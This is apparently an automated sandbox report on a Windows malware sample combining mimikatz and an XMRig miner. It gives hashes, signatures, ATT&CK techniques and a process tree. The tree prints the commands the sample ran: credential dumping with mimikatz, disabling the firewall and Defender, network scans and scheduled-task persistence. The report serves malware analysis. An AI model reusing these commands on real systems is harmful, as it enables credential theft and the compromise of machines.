Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    29-04-2024 13:47

General

  • Target

    2024-04-29_db11e4af7e733cec03e3e2d6adac5e23_hacktools_icedid_mimikatz.exe

  • Size

    7.4MB

  • MD5

    db11e4af7e733cec03e3e2d6adac5e23

  • SHA1

    06b123a75427dc7d191767db4595afa352601f7c

  • SHA256

    fea7d8a4ec3966ddf4d847d975d4dbb6505b09a1ffe7af19911c5438946efc74

  • SHA512

    7601e63df35b845b63c03116ecdb4f165d770a6d61194090e5df684853d02f12dad148be70852e2ddc5ffe7743b1de387c3f128314ec6d1b049f388c1b4999f3

  • SSDEEP

    196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1

Malware Config

Signatures

  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (27885) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs
  • UPX dump on OEP (original entry point) 35 IoCs
  • XMRig Miner payload 12 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 7 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Sets file execution options in registry 2 TTPs 40 IoCs
  • Executes dropped EXE 16 IoCs
  • Loads dropped DLL 22 IoCs
  • UPX packed file 30 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Creates a Windows Service
  • Drops file in System32 directory 12 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • NSIS installer 3 IoCs
  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 14 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 31 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:708
      • C:\Windows\TEMP\nzvbnyqcm\ieyftv.exe
        "C:\Windows\TEMP\nzvbnyqcm\ieyftv.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:1800
    • C:\Users\Admin\AppData\Local\Temp\2024-04-29_db11e4af7e733cec03e3e2d6adac5e23_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-04-29_db11e4af7e733cec03e3e2d6adac5e23_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1312
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\vigmimwm\ctnwzcw.exe
        2⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2008
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • Runs ping.exe
          PID:2944
        • C:\Windows\vigmimwm\ctnwzcw.exe
          C:\Windows\vigmimwm\ctnwzcw.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:2652
    • C:\Windows\vigmimwm\ctnwzcw.exe
      C:\Windows\vigmimwm\ctnwzcw.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Sets file execution options in registry
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2716
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2788
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
            PID:2784
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D users
            3⤵
              PID:2564
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
              3⤵
                PID:2748
              • C:\Windows\SysWOW64\cacls.exe
                cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                3⤵
                  PID:2476
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  3⤵
                    PID:2472
                  • C:\Windows\SysWOW64\cacls.exe
                    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                    3⤵
                      PID:1832
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static del all
                    2⤵
                    • Modifies data under HKEY_USERS
                    PID:2452
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add policy name=Bastards description=FuckingBastards
                    2⤵
                    • Modifies data under HKEY_USERS
                    PID:2864
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filteraction name=BastardsList action=block
                    2⤵
                      PID:1032
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c C:\Windows\qeysnigei\sniiiynbb\wpcap.exe /S
                      2⤵
                      • Loads dropped DLL
                      • Suspicious use of WriteProcessMemory
                      PID:2488
                      • C:\Windows\qeysnigei\sniiiynbb\wpcap.exe
                        C:\Windows\qeysnigei\sniiiynbb\wpcap.exe /S
                        3⤵
                        • Drops file in Drivers directory
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Drops file in System32 directory
                        • Drops file in Program Files directory
                        • Suspicious use of WriteProcessMemory
                        PID:2260
                        • C:\Windows\SysWOW64\net.exe
                          net stop "Boundary Meter"
                          4⤵
                            PID:2040
                            • C:\Windows\SysWOW64\net1.exe
                              C:\Windows\system32\net1 stop "Boundary Meter"
                              5⤵
                                PID:1068
                            • C:\Windows\SysWOW64\net.exe
                              net stop "TrueSight Meter"
                              4⤵
                                PID:868
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 stop "TrueSight Meter"
                                  5⤵
                                    PID:1236
                                • C:\Windows\SysWOW64\net.exe
                                  net stop npf
                                  4⤵
                                    PID:2184
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 stop npf
                                      5⤵
                                        PID:2092
                                    • C:\Windows\SysWOW64\net.exe
                                      net start npf
                                      4⤵
                                        PID:1784
                                        • C:\Windows\SysWOW64\net1.exe
                                          C:\Windows\system32\net1 start npf
                                          5⤵
                                            PID:2312
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /c net start npf
                                      2⤵
                                        PID:2804
                                        • C:\Windows\SysWOW64\net.exe
                                          net start npf
                                          3⤵
                                            PID:2952
                                            • C:\Windows\SysWOW64\net1.exe
                                              C:\Windows\system32\net1 start npf
                                              4⤵
                                                PID:2932
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /c net start npf
                                            2⤵
                                              PID:1984
                                              • C:\Windows\SysWOW64\net.exe
                                                net start npf
                                                3⤵
                                                  PID:536
                                                  • C:\Windows\SysWOW64\net1.exe
                                                    C:\Windows\system32\net1 start npf
                                                    4⤵
                                                      PID:696
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /c C:\Windows\qeysnigei\sniiiynbb\einztvbwt.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\qeysnigei\sniiiynbb\Scant.txt
                                                  2⤵
                                                  • Loads dropped DLL
                                                  PID:280
                                                  • C:\Windows\qeysnigei\sniiiynbb\einztvbwt.exe
                                                    C:\Windows\qeysnigei\sniiiynbb\einztvbwt.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\qeysnigei\sniiiynbb\Scant.txt
                                                    3⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    PID:700
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /c C:\Windows\qeysnigei\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\qeysnigei\Corporate\log.txt
                                                  2⤵
                                                  • Loads dropped DLL
                                                  • Drops file in Windows directory
                                                  PID:1692
                                                  • C:\Windows\qeysnigei\Corporate\vfshost.exe
                                                    C:\Windows\qeysnigei\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                                                    3⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:944
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "crtziqkbq" /ru system /tr "cmd /c C:\Windows\ime\ctnwzcw.exe"
                                                  2⤵
                                                    PID:1044
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                      3⤵
                                                        PID:1768
                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                        schtasks /create /sc minute /mo 1 /tn "crtziqkbq" /ru system /tr "cmd /c C:\Windows\ime\ctnwzcw.exe"
                                                        3⤵
                                                        • Creates scheduled task(s)
                                                        PID:1440
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "qinwmamni" /ru system /tr "cmd /c echo Y|cacls C:\Windows\vigmimwm\ctnwzcw.exe /p everyone:F"
                                                      2⤵
                                                        PID:1932
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                          3⤵
                                                            PID:1736
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            schtasks /create /sc minute /mo 1 /tn "qinwmamni" /ru system /tr "cmd /c echo Y|cacls C:\Windows\vigmimwm\ctnwzcw.exe /p everyone:F"
                                                            3⤵
                                                            • Creates scheduled task(s)
                                                            PID:2116
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "mehrtiyst" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\nzvbnyqcm\ieyftv.exe /p everyone:F"
                                                          2⤵
                                                            PID:2220
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                              3⤵
                                                                PID:1516
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                schtasks /create /sc minute /mo 1 /tn "mehrtiyst" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\nzvbnyqcm\ieyftv.exe /p everyone:F"
                                                                3⤵
                                                                • Creates scheduled task(s)
                                                                PID:904
                                                            • C:\Windows\SysWOW64\netsh.exe
                                                              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                                                              2⤵
                                                              • Modifies data under HKEY_USERS
                                                              PID:1940
                                                            • C:\Windows\SysWOW64\netsh.exe
                                                              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                                                              2⤵
                                                              • Modifies data under HKEY_USERS
                                                              PID:1688
                                                            • C:\Windows\SysWOW64\netsh.exe
                                                              netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                                              2⤵
                                                                PID:1992
                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                netsh ipsec static set policy name=Bastards assign=y
                                                                2⤵
                                                                • Modifies data under HKEY_USERS
                                                                PID:2540
                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                                                                2⤵
                                                                • Modifies data under HKEY_USERS
                                                                PID:2756
                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                                                                2⤵
                                                                • Modifies data under HKEY_USERS
                                                                PID:2720
                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                                                2⤵
                                                                • Modifies data under HKEY_USERS
                                                                PID:1064
                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                netsh ipsec static set policy name=Bastards assign=y
                                                                2⤵
                                                                  PID:1816
                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                                                                  2⤵
                                                                    PID:2688
                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                                                                    2⤵
                                                                    • Modifies data under HKEY_USERS
                                                                    PID:776
                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                    netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                                                    2⤵
                                                                    • Modifies data under HKEY_USERS
                                                                    PID:2492
                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                    netsh ipsec static set policy name=Bastards assign=y
                                                                    2⤵
                                                                      PID:2880
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      cmd /c net stop SharedAccess
                                                                      2⤵
                                                                        PID:2352
                                                                        • C:\Windows\SysWOW64\net.exe
                                                                          net stop SharedAccess
                                                                          3⤵
                                                                            PID:1680
                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                              C:\Windows\system32\net1 stop SharedAccess
                                                                              4⤵
                                                                                PID:1804
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            cmd /c netsh firewall set opmode mode=disable
                                                                            2⤵
                                                                              PID:2364
                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                netsh firewall set opmode mode=disable
                                                                                3⤵
                                                                                • Modifies Windows Firewall
                                                                                • Modifies data under HKEY_USERS
                                                                                PID:2040
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              cmd /c netsh Advfirewall set allprofiles state off
                                                                              2⤵
                                                                                PID:2336
                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                  netsh Advfirewall set allprofiles state off
                                                                                  3⤵
                                                                                  • Modifies Windows Firewall
                                                                                  • Modifies data under HKEY_USERS
                                                                                  PID:772
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                cmd /c net stop MpsSvc
                                                                                2⤵
                                                                                  PID:2184
                                                                                  • C:\Windows\SysWOW64\net.exe
                                                                                    net stop MpsSvc
                                                                                    3⤵
                                                                                      PID:2628
                                                                                      • C:\Windows\SysWOW64\net1.exe
                                                                                        C:\Windows\system32\net1 stop MpsSvc
                                                                                        4⤵
                                                                                          PID:696
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      cmd /c net stop WinDefend
                                                                                      2⤵
                                                                                        PID:2244
                                                                                        • C:\Windows\SysWOW64\net.exe
                                                                                          net stop WinDefend
                                                                                          3⤵
                                                                                            PID:2312
                                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                                              C:\Windows\system32\net1 stop WinDefend
                                                                                              4⤵
                                                                                                PID:1128
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            cmd /c net stop wuauserv
                                                                                            2⤵
                                                                                              PID:344
                                                                                              • C:\Windows\SysWOW64\net.exe
                                                                                                net stop wuauserv
                                                                                                3⤵
                                                                                                  PID:2812
                                                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                                                    C:\Windows\system32\net1 stop wuauserv
                                                                                                    4⤵
                                                                                                      PID:2952
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  cmd /c sc config MpsSvc start= disabled
                                                                                                  2⤵
                                                                                                    PID:1600
                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                      sc config MpsSvc start= disabled
                                                                                                      3⤵
                                                                                                      • Launches sc.exe
                                                                                                      PID:2932
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    cmd /c sc config SharedAccess start= disabled
                                                                                                    2⤵
                                                                                                      PID:2320
                                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                                        sc config SharedAccess start= disabled
                                                                                                        3⤵
                                                                                                        • Launches sc.exe
                                                                                                        PID:2548
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      cmd /c sc config WinDefend start= disabled
                                                                                                      2⤵
                                                                                                        PID:2296
                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                          sc config WinDefend start= disabled
                                                                                                          3⤵
                                                                                                          • Launches sc.exe
                                                                                                          PID:2860
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        cmd /c sc config wuauserv start= disabled
                                                                                                        2⤵
                                                                                                          PID:1700
                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                            sc config wuauserv start= disabled
                                                                                                            3⤵
                                                                                                            • Launches sc.exe
                                                                                                            PID:2420
                                                                                                        • C:\Windows\TEMP\xohudmc.exe
                                                                                                          C:\Windows\TEMP\xohudmc.exe
                                                                                                          2⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Drops file in System32 directory
                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                          PID:560
                                                                                                        • C:\Windows\TEMP\qeysnigei\fnbyeehzw.exe
                                                                                                          C:\Windows\TEMP\qeysnigei\fnbyeehzw.exe -accepteula -mp 708 C:\Windows\TEMP\qeysnigei\708.dmp
                                                                                                          2⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Modifies data under HKEY_USERS
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:1852
                                                                                                        • C:\Windows\TEMP\qeysnigei\fnbyeehzw.exe
                                                                                                          C:\Windows\TEMP\qeysnigei\fnbyeehzw.exe -accepteula -mp 1120 C:\Windows\TEMP\qeysnigei\1120.dmp
                                                                                                          2⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Modifies data under HKEY_USERS
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:2416
                                                                                                        • C:\Windows\TEMP\qeysnigei\fnbyeehzw.exe
                                                                                                          C:\Windows\TEMP\qeysnigei\fnbyeehzw.exe -accepteula -mp 1184 C:\Windows\TEMP\qeysnigei\1184.dmp
                                                                                                          2⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Modifies data under HKEY_USERS
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:2116
                                                                                                        • C:\Windows\TEMP\qeysnigei\fnbyeehzw.exe
                                                                                                          C:\Windows\TEMP\qeysnigei\fnbyeehzw.exe -accepteula -mp 2948 C:\Windows\TEMP\qeysnigei\2948.dmp
                                                                                                          2⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Modifies data under HKEY_USERS
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:2660
                                                                                                        • C:\Windows\TEMP\qeysnigei\fnbyeehzw.exe
                                                                                                          C:\Windows\TEMP\qeysnigei\fnbyeehzw.exe -accepteula -mp 1572 C:\Windows\TEMP\qeysnigei\1572.dmp
                                                                                                          2⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Modifies data under HKEY_USERS
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:2788
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          cmd.exe /c C:\Windows\qeysnigei\sniiiynbb\scan.bat
                                                                                                          2⤵
                                                                                                          • Loads dropped DLL
                                                                                                          PID:1096
                                                                                                          • C:\Windows\qeysnigei\sniiiynbb\ibvammnin.exe
                                                                                                            ibvammnin.exe TCP 191.101.0.1 191.101.255.255 445 512 /save
                                                                                                            3⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Drops file in Windows directory
                                                                                                            PID:1236
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                                                                                          2⤵
                                                                                                            PID:1496
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                              3⤵
                                                                                                                PID:2584
                                                                                                              • C:\Windows\SysWOW64\cacls.exe
                                                                                                                cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                                                                                                                3⤵
                                                                                                                  PID:2540
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                  3⤵
                                                                                                                    PID:2736
                                                                                                                  • C:\Windows\SysWOW64\cacls.exe
                                                                                                                    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                                                                                                                    3⤵
                                                                                                                      PID:1444
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                      3⤵
                                                                                                                        PID:2388
                                                                                                                      • C:\Windows\SysWOW64\cacls.exe
                                                                                                                        cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                                                                                                        3⤵
                                                                                                                          PID:2452
                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                      C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
                                                                                                                      1⤵
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:2572
                                                                                                                    • C:\Windows\SysWOW64\gkmiuy.exe
                                                                                                                      C:\Windows\SysWOW64\gkmiuy.exe
                                                                                                                      1⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                      PID:280
                                                                                                                    • C:\Windows\system32\taskeng.exe
                                                                                                                      taskeng.exe {31C08B5A-B740-46FD-8874-D16FAC082CDF} S-1-5-18:NT AUTHORITY\System:Service:
                                                                                                                      1⤵
                                                                                                                        PID:624
                                                                                                                        • C:\Windows\system32\cmd.EXE
                                                                                                                          C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\vigmimwm\ctnwzcw.exe /p everyone:F
                                                                                                                          2⤵
                                                                                                                            PID:2216
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                              3⤵
                                                                                                                                PID:2820
                                                                                                                              • C:\Windows\system32\cacls.exe
                                                                                                                                cacls C:\Windows\vigmimwm\ctnwzcw.exe /p everyone:F
                                                                                                                                3⤵
                                                                                                                                  PID:1532
                                                                                                                              • C:\Windows\system32\cmd.EXE
                                                                                                                                C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\nzvbnyqcm\ieyftv.exe /p everyone:F
                                                                                                                                2⤵
                                                                                                                                  PID:1544
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                    3⤵
                                                                                                                                      PID:1768
                                                                                                                                    • C:\Windows\system32\cacls.exe
                                                                                                                                      cacls C:\Windows\TEMP\nzvbnyqcm\ieyftv.exe /p everyone:F
                                                                                                                                      3⤵
                                                                                                                                        PID:1624
                                                                                                                                    • C:\Windows\system32\cmd.EXE
                                                                                                                                      C:\Windows\system32\cmd.EXE /c C:\Windows\ime\ctnwzcw.exe
                                                                                                                                      2⤵
                                                                                                                                        PID:2900
                                                                                                                                        • C:\Windows\ime\ctnwzcw.exe
                                                                                                                                          C:\Windows\ime\ctnwzcw.exe
                                                                                                                                          3⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                          PID:2212
                                                                                                                                      • C:\Windows\system32\cmd.EXE
                                                                                                                                        C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\vigmimwm\ctnwzcw.exe /p everyone:F
                                                                                                                                        2⤵
                                                                                                                                          PID:3176
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                            3⤵
                                                                                                                                              PID:3408
                                                                                                                                            • C:\Windows\system32\cacls.exe
                                                                                                                                              cacls C:\Windows\vigmimwm\ctnwzcw.exe /p everyone:F
                                                                                                                                              3⤵
                                                                                                                                                PID:3400
                                                                                                                                            • C:\Windows\system32\cmd.EXE
                                                                                                                                              C:\Windows\system32\cmd.EXE /c C:\Windows\ime\ctnwzcw.exe
                                                                                                                                              2⤵
                                                                                                                                                PID:3172
                                                                                                                                                • C:\Windows\ime\ctnwzcw.exe
                                                                                                                                                  C:\Windows\ime\ctnwzcw.exe
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                  PID:3416
                                                                                                                                              • C:\Windows\system32\cmd.EXE
                                                                                                                                                C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\nzvbnyqcm\ieyftv.exe /p everyone:F
                                                                                                                                                2⤵
                                                                                                                                                  PID:3536
                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                                    3⤵
                                                                                                                                                      PID:3396
                                                                                                                                                    • C:\Windows\system32\cacls.exe
                                                                                                                                                      cacls C:\Windows\TEMP\nzvbnyqcm\ieyftv.exe /p everyone:F
                                                                                                                                                      3⤵
                                                                                                                                                        PID:3388
                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                    C:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -Embedding
                                                                                                                                                    1⤵
                                                                                                                                                      PID:2616
                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                      C:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -Embedding
                                                                                                                                                      1⤵
                                                                                                                                                        PID:2768
                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                        C:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -Embedding
                                                                                                                                                        1⤵
                                                                                                                                                          PID:3664

                                                                                                                                                        Network

                                                                                                                                                        MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                                        Execution

                                                                                                                                                        Scheduled Task/Job

                                                                                                                                                        1
                                                                                                                                                        T1053

                                                                                                                                                        Persistence

                                                                                                                                                        Create or Modify System Process

                                                                                                                                                        1
                                                                                                                                                        T1543

                                                                                                                                                        Windows Service

                                                                                                                                                        1
                                                                                                                                                        T1543.003

                                                                                                                                                        Boot or Logon Autostart Execution

                                                                                                                                                        1
                                                                                                                                                        T1547

                                                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                                                        1
                                                                                                                                                        T1547.001

                                                                                                                                                        Scheduled Task/Job

                                                                                                                                                        1
                                                                                                                                                        T1053

                                                                                                                                                        Privilege Escalation

                                                                                                                                                        Create or Modify System Process

                                                                                                                                                        1
                                                                                                                                                        T1543

                                                                                                                                                        Windows Service

                                                                                                                                                        1
                                                                                                                                                        T1543.003

                                                                                                                                                        Boot or Logon Autostart Execution

                                                                                                                                                        1
                                                                                                                                                        T1547

                                                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                                                        1
                                                                                                                                                        T1547.001

                                                                                                                                                        Scheduled Task/Job

                                                                                                                                                        1
                                                                                                                                                        T1053

                                                                                                                                                        Defense Evasion

                                                                                                                                                        Impair Defenses

                                                                                                                                                        1
                                                                                                                                                        T1562

                                                                                                                                                        Disable or Modify System Firewall

                                                                                                                                                        1
                                                                                                                                                        T1562.004

                                                                                                                                                        Modify Registry

                                                                                                                                                        2
                                                                                                                                                        T1112

                                                                                                                                                        Subvert Trust Controls

                                                                                                                                                        1
                                                                                                                                                        T1553

                                                                                                                                                        Install Root Certificate

                                                                                                                                                        1
                                                                                                                                                        T1553.004

                                                                                                                                                        Discovery

                                                                                                                                                        Network Service Discovery

